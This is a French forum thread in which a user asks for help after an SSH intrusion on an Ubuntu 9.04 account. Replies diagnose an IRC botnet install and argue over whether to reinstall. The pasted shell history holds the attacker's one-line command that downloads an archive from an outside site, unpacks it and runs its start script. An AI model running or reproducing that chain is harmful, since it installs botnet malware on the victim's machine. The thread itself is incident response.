[balicocat]

hacking ou virus de mon ubuntu 9.04?

a l'origine un compte mal protegé et ssh distant (je sais j'ai trop confiance...) pas dans le sudoers (faut quand meme pas pousser)

Qui pourrait m'en dire plus ?


#cat /home/invite/.bash_history
passwd
w
ls
wget www.tradelinux.info/emech/nou.tgz;tar zxvf nou.tgz;cd tester;./start bum
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

/* le type s'est connecté , a changer le mot de passe, téléchargé 2 archives et executé start

Si vous voulez je poste le nou.tgz qui contient plusieurs scripts
Et si vous etes interressé, je vous donne plus d'infos ce soir
A+
balicocat

[_o_]

Bonne nouvelle, tu héberges maintenant un joli serveur irc qui doit rentrer dans un botnet quelconque. Les scripts sont écrits avec les pieds, mais ça a l'air opérationnel. Pour ce qui est de l'histoire du SP Windows, tu n'es pas le seul à avoir rencontré ce genre de choses :
http://forums.debian.net/viewtopic.php?f=10&t=47486
http://forums.overclockers.com.au/showthread.php?t=805816

Maintenant, je ne veux pas être pessimiste, mais la machine étant compromise, je ne vois pas d'autre solution qu'un bon gros format et une réinstallation. Et si tu souhaites sauvegarder des données avant, t'as intérêt à contrôler de très près le contenu...

[the lsd]

Fais en une épreuve hack Forensic !

Enjoy

The lsd

[balicocat]

mouais, j'y penserai !
Ceci dit, c'était une pénétration par ssh sur un seul compte (sans droits sudo)
j'ai désactivé ce compte, re-installé fail2ban (comme un con, je l'avais oublié après avoir changé le DD du PC et réinstalléé le système).
Je dois faire plus selon vous ? tout effacer et réinstaller ? Ces scripts peuvent-ils (à la maniere de virus) infecter d'autres fichiers (hors de son /home/). La désactivation de ce compte ne suffit-elle pas ?


Edit : J'oubliai : merci pour vos réponses (précedentes et à venir)

[robert33]

Normalement c'est bon, si ton noyau est à jour (pas d'exploit local) et que c'etait un user simple, (suffit de faire ls -l / et regarder les droits et vérifier les fichiers/dossiers), ton système ne devrait pas être corrompu.

[_o_]

Normalement c'est bon, si ton noyau est à jour (pas d'exploit local) et que c'etait un user simple, (suffit de faire ls -l / et regarder les droits et vérifier les fichiers/dossiers), ton système ne devrait pas être corrompu.

C'est une blague ? La machine est corrompue, tu n'as que cette certitude. Un noyau à jour ne protège pas d'un 0day.